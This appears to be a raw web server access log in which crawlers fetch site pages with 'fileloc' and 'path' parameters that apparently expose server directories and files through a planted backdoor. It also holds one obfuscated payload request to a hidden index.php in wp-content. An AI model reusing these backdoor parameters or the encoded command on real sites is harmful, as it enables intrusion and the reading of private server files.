74.7.227.114 - - [05/Nov/2025:00:08:18 +0000] "GET /q-~140wQ9R0RPxMpaGHCGFC7sYa8jYqHvifb3673/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 12114 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.182 - - [05/Nov/2025:00:08:18 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fapt-config&path=%2F%2Fbin HTTP/1.0" 200 2814 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:19 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Flib%2Fgroff%2Fgrog HTTP/1.0" 200 3159 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:19 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fsg_write_same&path=%2F%2Fbin HTTP/1.0" 200 2816 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:19 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fopt%2Ffphp HTTP/1.0" 200 3491 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:19 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2Fvar%2Flog%2Fnginx%2Fparking.access.log.49.gz&path=%2Fvar%2Flog%2Fnginx HTTP/1.0" 200 2845 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:19 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2F89 HTTP/1.0" 200 4711 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:19 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Flinux-version&path=%2F%2Fbin HTTP/1.0" 200 4085 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:20 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2Fvar%2Flog%2Fnginx%2Fparking.access.log.14.gz&path=%2Fvar%2Flog%2Fnginx HTTP/1.0" 200 2844 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:20 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2F794 HTTP/1.0" 200 4705 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:20 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2F29 HTTP/1.0" 200 4711 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:20 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fbashbug&path=%2F%2Fbin HTTP/1.0" 200 5782 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:20 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fsys HTTP/1.0" 200 3355 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:20 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fman-db%2Fglobbing&path=%2F%2Flib%2Fman-db HTTP/1.0" 200 2825 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:21 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2F166 HTTP/1.0" 200 4708 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:21 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fudev%2Fusb_modeswitch&path=%2F%2Flib%2Fudev HTTP/1.0" 200 3577 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:21 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fmecab%2Fmecab-system-eval&path=%2F%2Flib%2Fmecab HTTP/1.0" 200 2823 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:21 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fboot%2FSystem.map-5.4.0-216-generic&path=%2F%2Fboot HTTP/1.0" 200 2816 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:21 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fubuntu-release-upgrader%2Frelease-upgrade-motd&path=%2F%2Flib%2Fubuntu-release-upgrader HTTP/1.0" 200 3564 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:21 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2Fvar%2Flog%2Fnginx%2Ferror.log.39.gz&path=%2Fvar%2Flog%2Fnginx HTTP/1.0" 200 2837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:21 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fetc%2Ffastpanel2-phpmyadmin HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:22 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fmysqlcheck&path=%2F%2Fbin HTTP/1.0" 200 2813 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:22 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2F96 HTTP/1.0" 200 4712 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:22 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2Fvar%2Flog%2Fnginx%2Fparking.access.log.13.gz&path=%2Fvar%2Flog%2Fnginx HTTP/1.0" 200 2844 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:22 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fdirmngr-client&path=%2F%2Fbin HTTP/1.0" 200 2816 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.114 - - [05/Nov/2025:00:08:22 +0000] "GET /q-~289XHEZMvTXlxBz8lKoykkj7sRGzMrq0a21688/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 12114 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.182 - - [05/Nov/2025:00:08:22 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Ftmp%2Fsession_cache.tmp&path=%2F%2Ftmp HTTP/1.0" 200 2835 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
217.113.194.32 - - [05/Nov/2025:00:08:23 +0000] "GET /our-works/tvc-kimiko/?path=/var/www/lamphim/data/www/lamphimquangcao.net/wp-content HTTP/1.0" 200 3518 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
216.73.216.182 - - [05/Nov/2025:00:08:23 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2F2 HTTP/1.0" 200 4704 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:23 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2F3 HTTP/1.0" 200 4704 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:23 +0000] "GET /our-works/phim-viral-nestle?path=%2Fvar%2Flib%2Flandscape HTTP/1.0" 200 3163 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:23 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fopenssh%2Fagent-launch&path=%2F%2Flib%2Fopenssh HTTP/1.0" 200 3184 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:23 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fpolicykit-1%2Fpolkitd&path=%2F%2Flib%2Fpolicykit-1 HTTP/1.0" 200 2827 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:24 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Finit%2Fvars.sh&path=%2F%2Flib%2Finit HTTP/1.0" 200 3471 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:24 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fbin%2Fmysql_tzinfo_to_sql&path=%2F%2Fbin HTTP/1.0" 200 2821 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:24 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fperl&path=%2F%2Fbin HTTP/1.0" 200 2809 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.248.20 - - [05/Nov/2025:00:06:03 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323330343736332p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323330313136332q3236663738316665356232343036333461356266623435643938343966663832222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
216.73.216.182 - - [05/Nov/2025:00:08:24 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Frun%2Fmount HTTP/1.0" 200 3190 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:24 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Frun%2Fblkid HTTP/1.0" 200 3188 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:24 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fetc%2Ftmpfiles.d HTTP/1.0" 200 3211 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:25 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fbin%2Fmysqlbinlog&path=%2F%2Fbin HTTP/1.0" 200 2816 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:25 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fdev%2Fdisk HTTP/1.0" 200 3263 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:25 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2Fvar%2Frun%2Fcloud-init%2Fds-identify.log&path=%2Fvar%2Frun%2Fcloud-init HTTP/1.0" 200 3641 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:25 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fsudo%2Fsystem_group.so&path=%2F%2Flib%2Fsudo HTTP/1.0" 200 2826 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:25 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fpsfxtable&path=%2F%2Fbin HTTP/1.0" 200 2812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:25 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fsg_read_block_limits&path=%2F%2Fbin HTTP/1.0" 200 2820 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:25 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fpackagekit%2Fpk-debconf-helper&path=%2F%2Flib%2Fpackagekit HTTP/1.0" 200 2837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:25 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2F92 HTTP/1.0" 200 4711 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:25 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2F648 HTTP/1.0" 200 4709 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:26 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2Fvar%2Flog%2Fnginx%2Ferror.log.34.gz&path=%2Fvar%2Flog%2Fnginx HTTP/1.0" 200 2837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:26 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2F501 HTTP/1.0" 200 4705 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:26 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2F10 HTTP/1.0" 200 4710 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.114 - - [05/Nov/2025:00:08:26 +0000] "GET /q-~34ReTmMLgzaBJYLQcO4Zt5yLve0a9ord11021/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 12114 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.182 - - [05/Nov/2025:00:08:26 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fvar%2Flib HTTP/1.0" 200 4623 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:26 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fopen-iscsi%2Flogout-all.sh&path=%2F%2Flib%2Fopen-iscsi HTTP/1.0" 200 3664 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:26 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2F93 HTTP/1.0" 200 4711 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:26 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2F582 HTTP/1.0" 200 4705 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:27 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fdovecot%2Findexer&path=%2F%2Flib%2Fdovecot HTTP/1.0" 200 2825 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:27 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fmultipath%2Flibprioontap.so&path=%2F%2Flib%2Fmultipath HTTP/1.0" 200 2826 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:27 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fsystemd-resolve&path=%2F%2Fbin HTTP/1.0" 200 2815 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:27 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fdebconf-apt-progress&path=%2F%2Fbin HTTP/1.0" 200 6136 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:27 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fsg_read_buffer&path=%2F%2Fbin HTTP/1.0" 200 2817 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:27 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fpackagekit%2Fpk-offline-update&path=%2F%2Flib%2Fpackagekit HTTP/1.0" 200 2836 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:27 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fself HTTP/1.0" 200 4821 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:27 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fsudo%2Fgroup_file.so&path=%2F%2Flib%2Fsudo HTTP/1.0" 200 2824 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:27 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fcheck-language-support&path=%2F%2Fbin HTTP/1.0" 200 3808 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:28 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2F78 HTTP/1.0" 200 4711 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:28 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fdpkg-maintscript-helper&path=%2F%2Fbin HTTP/1.0" 200 7684 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:28 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fdev%2Fsnd HTTP/1.0" 200 2872 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:28 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fnetplan%2Fgenerate&path=%2F%2Flib%2Fnetplan HTTP/1.0" 200 2824 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:28 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fmultipath%2Flibpriordac.so&path=%2F%2Flib%2Fmultipath HTTP/1.0" 200 2825 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:28 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fphp-cgi7.4&path=%2F%2Fbin HTTP/1.0" 200 2814 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:28 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2F100 HTTP/1.0" 200 4703 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:29 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2F689 HTTP/1.0" 200 4709 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:29 +0000] "GET /our-works/phim-viral-nestle?path=%2Fvar%2Flib%2Fusbutils HTTP/1.0" 200 3160 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.66.164 - - [05/Nov/2025:00:08:28 +0000] "GET /sitemap-detail-1936.xml HTTP/1.0" 200 4415 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.182 - - [05/Nov/2025:00:08:29 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Frun%2Ftmpfiles.d HTTP/1.0" 200 3162 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:29 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2F657 HTTP/1.0" 200 4709 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:29 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fglib-compile-schemas&path=%2F%2Fbin HTTP/1.0" 200 2820 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:30 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Frun%2Ffsck HTTP/1.0" 200 3147 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.114 - - [05/Nov/2025:00:08:30 +0000] "GET /q-~252rAG9ymxZsYif9HiKN2QcSKsMVIiouw34457/?path=/var/www/lamphim/data/www/lamphimquangcao.net/images/images/images HTTP/1.0" 200 3367 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.182 - - [05/Nov/2025:00:08:30 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fdovecot%2Fdeliver&path=%2F%2Flib%2Fdovecot HTTP/1.0" 200 2825 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:30 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fpyhtmlizer3&path=%2F%2Fbin HTTP/1.0" 200 3035 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:30 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fbin%2Fsg_reassign&path=%2F%2Fbin HTTP/1.0" 200 2814 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:31 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2Fvar%2Flog%2Fnginx%2Ferror.log.38.gz&path=%2Fvar%2Flog%2Fnginx HTTP/1.0" 200 2837 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:31 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Frun%2Fmotd.d HTTP/1.0" 200 3149 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:31 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Fetc%2Fmysql HTTP/1.0" 200 3463 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:08:31 +0000] "GET /our-works/phim-viral-nestle?path=%2F%2Flib%2Fsystemd%2Fcatalog HTTP/1.0" 200 3581 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
